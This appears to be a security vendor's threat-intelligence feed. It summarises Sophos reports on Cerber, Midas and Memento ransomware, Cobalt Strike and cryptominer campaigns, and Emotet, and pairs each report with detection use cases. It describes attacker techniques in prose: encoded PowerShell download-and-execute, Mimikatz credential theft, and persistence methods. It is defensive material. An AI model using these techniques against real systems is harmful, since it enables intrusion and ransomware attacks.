Cerber Ransomware Exploits Confluence Vulnerability

June 21, 2022

 

Cerber Ransomware Exploits Confluence Vulnerability

Industry: N/A | Level: Tactical | Source: Sophos

Sophos tracking of Confluence vulnerability CVE-2022-26134, has discovered the attack vector is shrinking with less vulnerable Confluence servers being identified. However, two exploit attempts were observed from Sophos targeting Windows servers with the objective to deploy Cerber ransomware. The activity observed involved the attackers running curl and PowerShell commands on the affected host. The PowerShell command was initially encoded containing instructions to download and execute a payload saved in the %temp% folder. The attack was unsuccessful and mitigated with no evidence of exfiltration or lateral movement.

Anvilogic Use Cases:

  • Invoke-WebRequest Command
  • Encoded Powershell Command
  • Invoke-Expression Command
  • Executable Process from Suspicious Folder

Attackers Exploit Telerik UI to Deliver Cryptominer and Cobalt Strike

June 21, 2022

 

Attackers Exploit Telerik UI to Deliver Cryptominer and Cobalt Strike

Industry: N/A | Level: Tactical | Source: Sophos

Sophos researchers noticed the reuse of tactics, techniques, and procedures (TTPs) by attackers when exploiting Telerik UI vulnerability CVE-2019-18935 to initially deliver Cobalt Strike and download additional payloads. The attack pattern has been since the vulnerability was disclosed, as shared by Sophos “In the incidents we investigated, the threat actor exploited the vulnerability (designated CVE-2019-18935) to deliver a Cobalt Strike beacon (in the form of a DLL payload) to disk, then used the beacon to execute encoded PowerShell commands, which downloaded more malware, and established persistence on the servers through some novel methods.” The observed attack chain commenced with the exploit of the Telerik UI vulnerability and delivering a Cobalt Strike DLL payload that often lands in the C:\Windows\Temp directory. The attacker would run encoded PowerShell commands to download and execute additional malware from the command and control server. Malware would be downloaded on the victim’s host includes an executable injecting itself into cmd.exe, the XMRig Miner cryptominer, and a configuration JSON file for cryptomining. Observed in a different environment that was exploited with Telerik UI vulnerability, a similar attack pattern was discovered however, the attacker also established persistence through group policy objects and a scheduled task. The threat actor responsible for the attacker is currently unknown, while there is a correlation with the Blue Mockingbird threat actor having exploited CVE-2019-18935 in May 2020, many of the group’s typical TTPs were absent in the observed incidents.

Anvilogic Scenario:

  • Cobalt Strike or GPO leads to PowerShell & Cryptomining

Anvilogic Use Cases:

  • Cobalt Strike Beacon
  • Suspicious File written to Disk
  • Modify Registry Key
  • Modify Group Policy
  • Suspicious Executable by CMD.exe

Financial Fraud with Exchange Vulnerabilities

February 22, 2022

Financial Fraud with Exchange Vulnerabilities

Industry: N/A | Level: Tactical | Source: Sophos

Malware loader, Squirrelwaffle emerged in September 2021 and continues its spread through exploiting Microsoft Exchange ProxyLogon and ProxyShell vulnerabilities. Observed by Sophos, hijacked emails are used to advance the spread of Squirrelwaffle, Sophos investigations also identified attackers committing financial fraud attacks using the information obtained from the hijacked emails. The hijacked emails contained information for customer payments, the attackers created a “typo-squatted” domain and sent fraudulent replies to an email thread requesting assistance in a manner providing them access to the victim’s payments.

  • Anvilogic Use Case: Potential ProxyShell

Midas Ransomware

February 01, 2022

Midas Ransomware

Industry: Technology | Level: Tactical | Source: Sophos

Sophos reported, deployment of Midas ransomware against a technology vendor in December 2021. A review of the threat indicators identified the attackers were active on the network for at least two months with the earliest indicator of compromise found on October 13th, 2021. The organization’s network was unfortunately not complicated following a flat topology with no network segmentation. The attackers also took advantage of commercial remote access tools, AnyDesk and TeamViewer, to move laterally in the network as the organization had utilized the software previously for tests, however, did not uninstall them from the servers. Identified by Sophos a unique aspect of the compromise, involves the attackers crafting and installing PowerShell scripts as services prior to the deployment of ransomware. The activity was carefully engineered during the two months they were on the network. Due to a visibility gap, it is unknown how the attackers accessed the domain controller or obtained Admin permissions. Threat activity progressed slowly from October 13th to November 2nd and picked up again on November 25th with ransomware deployment on December 7th. Observed threat activity on the network included using process hacker to identify processes, Mimikatz for credential harvesting, execution of scripts from TEMP and AppData directories and exfiltrating data to a cloud service.

  • Anvilogic Use Cases:
    • Windows Service Created
    • Obfuscated Powershell Techniques
    • RDP Hijacking
    • Mimikatz
    • Executable Process from Suspicious Folder

Emotet and App Installer

December 01, 2021

Emotet and App Installer

Industry: N/A | Level: Tactical | Sources: Twitter – @malware_traffic & BleepingComputer

Sophos reported on November 11th 2021, Emotet malware is following the same tactics utilized by Bazarloader for abusing the Windows App Installer packages, says twitter security researcher @malware_traffic. The attack chain starts with an email from a stolen reply chain with a URL link to an alleged PDF document. The link leads to a Google Drive styled page where a download will occur for a file hosted on Microsoft Azure URLs at .web.core.windows.net. Following the install of an alleged Adobe PDF component, a DLL file will be downloaded to the %Temp% folder and executed with rundll32, additionally an autorun entry gets created.

  • Anvilogic Scenario: Malware & AppInstaller
  • Anvilogic Use Cases:
    • AppInstaller.exe Download
    • New AutoRun Registry Key

Memento Team, Ransomware Gang

November 23, 2021

Memento Team, Ransomware Gang

Industry: N/A | Level: Operational | Source: Sophos

Ransomware gang, Memento Team, was observed by Sophos to have bypassed encryption protection using password-protected archives with WinRAR when the group’s initial Python 3.9 script was stopped by endpoint protection. The group was active in their victim’s network for a long time as there was a six-month dwell time from their initial access in April 2021, exploiting CVE-2021-21972 a vCenter vulnerability. During the threat actor’s time on the compromised network, they also deployed two coin-miners, XMR on May 18th, and XMRig on September 8th, which led to the victim’s network being encrypted with a password archive in October.

  • Anvilogic Scenario: Memento Team – Behavior